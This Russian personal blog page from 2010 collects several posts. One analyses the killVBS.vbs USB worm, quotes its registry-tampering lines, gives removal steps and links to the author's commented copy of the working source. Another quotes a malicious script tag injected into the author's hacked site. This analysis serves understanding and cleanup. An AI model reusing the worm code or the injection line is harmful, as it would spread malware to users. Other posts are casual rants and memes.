19.11.10

Вирус killVBS.vbs

Не так давно почти все флэшки моего города были поражены тотальной эпидемией вируса killVBS.vbs. Этот вирус распространяется исключительно на съемных носителях и запускается сразу при подключении его к компьютеру, потому что Windows слепо повинуется файлу autorun.inf. Благо, начиная с Висты, ситуация изменилась.

Кстати, невероятно, но autorun.inf работает и для локальных дисков, по крайней мере в XP. То есть, вы можете запросто назначать диску программу для автозапуска и даже менять иконку диска.

Но вернемся к killVBS.vbs.
Поскольку вирус этот, собственно, код VB-Скрипта в чистом виде, я не упустил возможности изучить его код и понять, что делает вирус и каким образом без конца самокопируется.

Многие антивирусники уже научились распознавать этот тип вирусов, но вот с удалением или даже помещением на карантин происходит большой фейл. Стоит антивируснику удалить или переместить этот файл, он тут же создается снова, на том же месте. Антивирус бьет новую тревогу сразу после удаления вируса, и снова, и снова. Так уставшему юзеру приходится просто проигнорировать бесконечные сообщения антивируса, и оставить killVBS в покое.

А все дело в том, что вирус, ясное дело, загружается в оперативку, сохраняет свое содержимое в переменную, и в случае, если его файл на диске был удален, создает его снова и снова. А поскольку это VBScript, то исполняется он, разумеется, не самостоятельно, а файлом WScript.exe, стандартным ЕХЕ-шником для запуска VBS-файлов. Видимо поэтому антивирусы не могут распознать его в процессах.

Убить этот вирус очень легко. Достаточно убить процесс wscript.exe через Диспетчер задач, и вирус безоружен. Можно будет беспрепятственно удалить его с диска. Помимо дисков, он еще копирует себя в папку Windows\System32, найдите и убейте его там. После этого поищите сочетание "killVBS.vbs" в реестре и удалите все упоминания о нем.

Впрочем, вирус этот довольно безобиден и реальной угрозы не представляет. Вот что он делает:

  • Копирует себя на другие съемные носители и в папку Windows\System32.
  • Прописывает свой автозапуск реестре.
  • Создает файл autorun.inf на всех съемных дисках и прописывает там свой автозапуск.

Помимо этого, еще вносит несколько небольших изменений в реестр, которые видны на этом куске кода из вируса:

Shells.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"

Он постоянно обнуляет заголовок и адрес стартовой страницы в Internet Explorer'е (видимо, автор вируса против использования таких кривых браузеров), меняет значок для vbs-файлов (я так до конца и не понимаю этот шаг) и удаляет в реестре ветку "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL". К сожалению, не знаю для чего это делается.

Что касается исходного кода в целом, то он написан в очень странном стиле. В коде есть шокирующие места, выполненные в стиле недо-программистов, узнавших про программирование только вчера. Нет единства в регистре ключевых слов, где-то написано "End If", а где "end if". А еще куча очень странных по логике вложенных if-ов, например:

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path <> "A:" Then
  If Drives.DriveType = 1 Then
   If Drives.Path <> "A:" Then
   <...>

Однако при изучении исходника вируса, я навел в коде порядок: расставил отступы, сделал одинаковый регистр у всех слов и прокомментировал самые важные моменты в работе вируса. Желающие посмотреть врагу в лицо, могут скачать его откомментированный исходник в виде TXT-файла: http://vladikcomper.narod.ru/download/killVBS.txt http://upwap.ru/1135430 http://zalil.ru/29998591

Только не стоит менять расширение на *.vbs и запускать - вирус вроде рабочий.

(11 комментариев)

01.10.10

Sonic Quick Winter Adventures 2

(23 комментария)

21.09.10

Накопилось

Вот уже несколько лет мне приходится пользоваться телефоном Nokia 7510 Супернова. За годы общения с ним я обнаружил, что Нокиа Суперхренова на 100% состоит из чистого, натурального пиздеца, как и все телефоны Нокиа.

Про это чудо я писал еще в далеком 2009-м (http://vladikcomper.yanex.org/blog/?id=20) тогда я был более позитивного мнения о телефоне, так как еще не был знаком с половиной поджидающих меня пиздецов.
Надо, конечно, быть полными мудаками, чтобы засунуть команду воспроизведение видео в меню Функции, так что каждый раз, когда я хочу вопроизвести видео, мне надо лезть в меню Функции, которое, кстати, перебито кучей мусора, и выбирать команду воспроизвести.
Мой совет всем, кто собирается покупать телефоны Нокиа - не покупайте телефоны Нокиа. В последнее время у них устойчивая тенденция к скатыванию в сраное говно. Лучше накопите на смартфон или телефон от мненяемого производителя.

* * *

Убийственный фильм, длинной в 5 секунд:
http://www.youtube.com/watch?v=kfchvCyHmsc

* * *

Вот уже год я ради прикола держу подлюченными к своему компу сразу две мышки.

Светлая модель из них самая старая, год назад у нее сломалось колесико, что повлекло за собой появление новой модели. Старая мышь подключена через PS/2, новая - через USB. И они прекрасно уживаются друг с другом.
Кстати, иногда вторая мышь оказывается полезной. Например, когда кто-то сел на мое место, чтобы что-нибудь поискать в интернете, я всегда второй мышкой смогу направить его курсор в нужное русло.

* * *

А я упорно делаю S1HS2 ^_^ Ня.

* * *

Суровая реальность моего жесткого диска:

А у вас бывало хуже?

(27 комментариев)

21.08.10

Крупный переезд и обновление блога

Сегодня по-настоящему великий день, день, когда мой бложик наконец-то свалил с говно-хостинга 110mb.com, который устойчиво падал по нескольку раз в месяц, недогружал страницы и CSS-таблицы и один раз чуть не снес все мои файлы.

Теперь мой блог хостится на сайте моего друга Yanex'а, огромное ему спасибо за предоставление хостинга. ;-)

Интересно, что переезд начался еще 16 июля, но ввиду моей загруженности и занятостью другими проектами ленивости, завершился он только сегодня.

Кстати, переезд вовсе не заключался в тупом переносе файлов с хоста на хост - мне пришлось немного править движок, чтобы он заработал в новой для него обстановке, наконец-то выброшены костыли, использовавшиеся для работы на хостинге 110mb.com.

Помимо этого, блог довольно крупно обновился.

Пожалуй, самое главное нововведение - это смена кодировки с Win-1251 на UTF-8. Это, однако, стоило немалых усилий. Дело в том, что тексты записей и комментариев свалены в одну кучу, и хранятся в двух отдельных файлах. Для доступа к их текстам, используются поинтеры, указывающие на начало каждой записи в файлах с данными. После конвертирования в UTF-8 все данные сдвинулись, сбились все тексты новостей и комментариев. Проблема осложнялась тем, что в UTF-8 на символ приходится разное количество байт, так что исправить поинтеры было не так просто. Но я не поленился разработать программу для исправления поинтеров, чтобы сохранить все записи и комментарии на новом месте.

Кроме внутренних обновлений, было и пару наружных.

Теперь у блога есть свой RSS-канал. Правда, сделан он довольно примитивно - отображаются только ссылки на последние 5 новостей. Канал доступен по адресу http://vladikcomper.yanex.org/blog/rss/.

В меню блога появился новый пункт - Комментарии. В этом разделе отображается 20 последних комментариев и ссылки на новости, в которых они оставлены. Правда, сделано это на скорую руку, и о том, чтобы приделать к комментариям даты я не позаботился.

UPD: Ой да, совсем забыл - в разделе О блоге появились новые счетчики новостей и комментариев.

Кстати, вполне возможно, что с переделкой движка, добавились новые баги. Если вы столкнетесь с проблемами при просмотре блога, пожалуйста, сообщите мне об этом.

Спасибо за внимание. Наслаждайтесь новым бложиком.

(8 комментариев)

21.07.10

Настоящая электро-музыка

(5 комментариев)

13.07.10

Развод ASM-Team

Поразительно, как много нубов в Интернетах, как много тупых безмозглых одноклеточных форм жизни, которые хотят всего и сразу. В последнее время начинает активно развиваться новый вид безмозглых форм жизни, который помимо желания всего и сразу, начинает обильно качать свои безмоглые права и проявлять свою безмозглую агрессию. Новые представители рассы безмозглых начинают активно надоедать разумным формам жизни, они уже доминируют на многих форумах. Куда катится этот мир?

С тех пор, как я стал известным хакером сеговских игр в русском Сониковском комьюнити, я стал испытывать на себе аттаки неразумных форм жизни. Неразумные формы жизни задавали бесчисленное множество наитупейщих вопросов, ответы не просто можно за 5 секунд найти в Гугле, так можно даже самостоятельно догадаться.
А некоторые индивиды даже не умели распаковывать ZIP-архивы. И эти люди по совместительству хотели научиться программированию, как иронично!

Совсем недавно в русском Сониковсом комьюнити произошло событие, которое нанесло сокрушительный удар по тамашним нубам. Была в буквальном смысле разгромлена самая мощная и наглая команда нубов - Sonic ASM-Team.
Помимо всего этого этот разгром отличился тотальным количеством лулзов, читать которые просто умора. Он начинался как небольшой развод, за которым стояли я и Jet (aka Lomaster). Получился один из самых ярких и красивых разводов за всю историю.

Мы так сильно пудрили мозги нубам, прикидываясь даунами, и, поразительно, они верили буквально всему и даже не подозревали о разводе, пока мы сами им не сказали. К тому моменту их сайт был разгромлен, их мозги были тотально промыты.

Помимо всего этого, я написал рассказ-хронологию развода, чтобы запечатлить каждый его момент, так как это - действительно умора.

Рассказ о разводе: http://vladikcomper.narod.ru/download/ASMTeam.htm
Пост, разоблачающий развод: http://forum.sonic-world.ru/index.php?s=&showtopic=824&view=findpost&p=252285399

К сожалению, рассказ будет понятен только Соникфанам, однако развод оказался настолько плодотворен, что и для остальных нашлась куча лулзов.

ARTISBANG: Тут можно только писать матом, но не ругаться!!!


ARTISBANG: Ты не знаешь что такое АСМ???? Это исходный код игры


Leo: АСМ - это язык программирования, нижнего уровня.


Shadow-X: Хекс Едитор - это совершенный текстовый редактор.


Shadow-X: Мы команду создали несколько недель назад. А сами в асме шарим недавно.


Shadow-X: Это код-обман,фальшивка!!!!!!!
Этот код составлен из всяких частей кода!!!

(2 комментария)

25.06.10

Сайт Влада был взломан

Вчера вечером народовская часть Сайта Влада по непонятным причнам была недоступна - сервер моментально обрывал соединение при попытке открыть сайт. Сочтя это за очередную проблемму с сервером Народа, я не стал обращать на это большого внимания.

Сегодня утром сайт вернулся. Но при попытке зайти на сайт антивирус оборвал соединение - на сайте был обнаружен червь.
Это меня шокировало. Открыв исходник главной страницы, я обнаружил почти в самом конце чужеродный код:

<script type="text/javascript" src="http://dolfy.sedonahyperbarics.com:8080/Vector_Graphic.js"></script>

Как оказалось, этот код добавился на все страницы, обработаны были даже файлы скриптов.

Подобное со мноим сайтом случилось в 2007 году, тогда вредоносный код был добавлен только в гостевую книгу.
Похоже, это второй призыв к тому, что надо наконец менять хостинг.

Сейчас сайт полностью восстановлен.

(8 комментариев)

21.06.10

Про Википедию

С обновлением дизайна Википедия приятно преобразилась. Наконец-то поле для поиска заняло нормальное место в верху страницы, а рамок стало намного меньше.

Одно только на Википедии меня беспокоит. Это уже не касается дизайна, не бойтесь.
Википедию довольно часто терроризируют вандалы. Недавно я даже был свидетелем, как один ламер, выложивший свою кривую игру на форуме, тайно прорекламировал ее в Википедии (см. ниже). Это имело большой эффект - в тот же день его игра собрала свыше тысячи закачек.
Подобных примеров полно.

Не любитель вики:

Трудные роботы:

Большая часть людей адекватны и не занимаются троллингом и вандализмом, но вышепоказанные индивиды все равно есть и будут всегда.
Каждый раз, когда я вижу что-то подобное, я отменяю их правки, исправляю статьи.

Благо, что Википедия плевала на провокации убогих вандалов. Потому что движок Media-Wiki крут и позволяет отменять правки.
Однако видеть акты вандализма крайне неприятно, что говорить о наглой рекламе в середине статей. Закрывать доступ к Вики таким людям надо.

P.S.: а дизайн Главной страницы у сербской Вики лучше. :-Р
Да, и почитайте ее, сербский крут: http://sr.wikipedia.org/sr-ec/Главна_страна

(8 комментариев)

07.06.10

Сонные мухи

По качеству обслуживания Россия занимает третье место в мире, с конца. Сегодня я убедился в этом уже в который раз.

Прихожу в небольшой магазин, продающий товары для кэмпинга. Сонная продавшица, сидящая на рабочем месте даже не потрудилась поднять голову на покупателя. Я спрашиваю: "У вас есть сапоги 45-ого размера?". Продавшица приподняла голову и после двухсекундного подвисания чуть слышно, почти шепотом, сказала:
- Нет таких сапог, у нас все всё уже разобрали...
- Покажите хотя бы то что есть, хочу посмотреть, что они из себя представляют.
Продавшица, с выражением невыносимой скуки на лице, медленно поднялась и неторопливо пошла к прилавку с сапогами. Она показала мне один сапог, который с виду был достаточно большим, таким что наверняка бы мне подошел.
- Скажите, а какой у него размер?
- Сорок пятый, - пропищала продавшица.

И эта сонная муха не беспокоится за то, что ее выгонят за такую производительность или кто-то займет ее насиженное место. Потому что другие претенденты на ее должность еще хуже. Это порочный круг, из которого наша страна пока не может выбраться.

(4 комментария)

19.05.10

Интернеты...

Кем ты был в прошлой зизни?

Интересный баннер, рекламирующий наверное социальные сети для инопланетных собак. Да именно инопланетных! Земные собаки не перебирают ногами так, как это делает существо на баннере, также обратите внимание обращение к собакам в нижней строке:

Если бы Windows был сделан в СССР:

Немного статистики:
http://vladikcomper.narod.ru/blog/UFO_stat.jpg

Немного фактов:
http://vladikcomper.narod.ru/blog/RIP.jpg

Эта картинка полностью нарисована в Пейнте, где-то даже было видео, показывающее весь процесс, только к сожалению не помню где:
http://vladikcomper.narod.ru/blog/psp.gif

Ну и на десерт, замечательная подборка авто, автор которой, к сожалению, неизвестен:
http://vladikcomper.narod.ru/blog/auto.jpg

(2 комментария)

<< Назад | Вперед >>